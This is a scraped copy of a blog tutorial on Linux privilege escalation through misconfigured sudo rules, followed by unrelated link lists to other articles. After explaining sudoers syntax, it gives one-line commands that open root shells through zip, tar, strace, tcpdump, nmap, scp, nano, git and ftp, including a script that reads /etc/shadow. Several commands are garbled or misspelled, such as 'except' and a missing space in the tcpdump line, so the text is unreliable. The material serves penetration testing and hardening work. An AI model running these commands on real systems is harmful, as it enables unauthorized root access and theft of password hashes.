Abusing SUDO Advance for Linux Privilege Escalation
Index
- What is SUDO?
- Scenario.
- Sudoer FIle Syntax.
- Exploiting SUDO
- zip
- tar
- strace
- tcpdump
- nmap
- scp
- except
- nano & pico
- git
- ftp/gdb
What is SUDO ??
The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.
Scenario.
During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.
Sudoer File Syntax.
root ALL=(ALL) ALL
Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo
touhid ALL= /sbin/poweroff
Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password.
Exploiting SUDO Users.
To Exploiting sudo user u need to find which command u have to allow.sudo -l
The above command shows which command have allowed to the current user.
Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.
Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.
Using zip command
$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
Using tar command
$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
Using strace command
$ sudo strace -o/dev/null /bin/bash
Using tcpdump command
$ echo $’id\ncat /etc/shadow’ > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
Using nmap command
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse
Using scp command
$ sudo scp -S /path/yourscript x y
Using except command
$ sudo except spawn sh then sh
Using nano command
$ sudo nano -S /bin/bash
type your command and hit CTRL+T
Using git command
$ sudo git help status
type: !/bin/bash
Using gdb/ftp command
$ sudo ftp
type : !/bin/sh
Abusing SUDO Advance for Linux Privilege Escalation的更多相关文章
- Basic Linux Privilege Escalation
(Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...
- OSCP Learning Notes - Privilege Escalation
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- Linux/Unix System Level Attack、Privilege Escalation(undone)
目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...
- Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)
In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...
- CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://ha ...
- [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation
Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...
- FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit
/* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...
- [EXP]Memu Play 6.0.7 - Privilege Escalation
# Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...
随机推荐
- 基于VMware Workstation下CentOS的搭建
网络安全学习内容 二.VMware安装CentOS系统 需要准备的文件: 从http://mirrors.huaweicloud.com/centos/7.7.1908/isos/x86_64/中下载 ...
- [TimLinux] openpyxl 操作Excel
from openpyxl import Workbook from openpyxl.styles import Color, PatternFill, Font from openpyxl.sty ...
- csuoj-1900 锋芒毕露
Description 小闪最近迷上了二刀流——不过他耍的其实是剑——新买了一个宝库用来专门存放自己收集的双剑.一对剑有两把,分只能左手用的和只能右手用的,各自有一个攻击力数值.虽然一对剑在小闪刚拿到 ...
- 使用flink实现一个topN的程序
topN功能是一个非常常见的功能,比如查看最近几分钟的阅读最高数,购买最高数. flink实现topN的功能也非常方便,下面就开始构建一个flink topN的程序. 还是像上篇博客一样,从kafka ...
- linux需要了解的网络基础知识
第1章 网络命令 1.1 用户模式下的命令 1.1.1 enable切换到特权模式 Router>enable Router# 特权模式 Router# Router# 1.2 特权模式下的命令 ...
- USB摄像头之130w像素 OV9655配置,ov9650,ov7725,ov7670
USB摄像头之130w像素 OV9655配置 为了usb2.0采集达到足够的速率,不得不将采用raw格式输出. // 20150411 XVGA 1280*1024 实际上位机需要2560*1024 ...
- RequireJS 打包工具
r.js是RequireJS的一个附产品,支持在 NodeJS环境下运行AMD程序,并且其包含了一个名为RequireJS Optimizer的工具,可以为项目完成合并脚本等优化操作 RequireJ ...
- css修改overflow滚动条默认样式
html代码 <div class="inner"> <div class="innerbox"> <p style=" ...
- xshell6和xftp6运行提示缺少mfc110u.dll文件的解决办法
xshell6和xftp6运行提示缺少mfc110u.dll文件的解决办法 下载地址 http://www.microsoft.com/zh-CN/download/details.aspx?id=3 ...
- 手把手教你看懂并理解Arduino PID控制库——引子
介绍 本文主要依托于Brett Beauregard大神针对Arduino平台撰写的PID控制库Arduino PID Library及其对应的帮助博客Improving the Beginner’s ...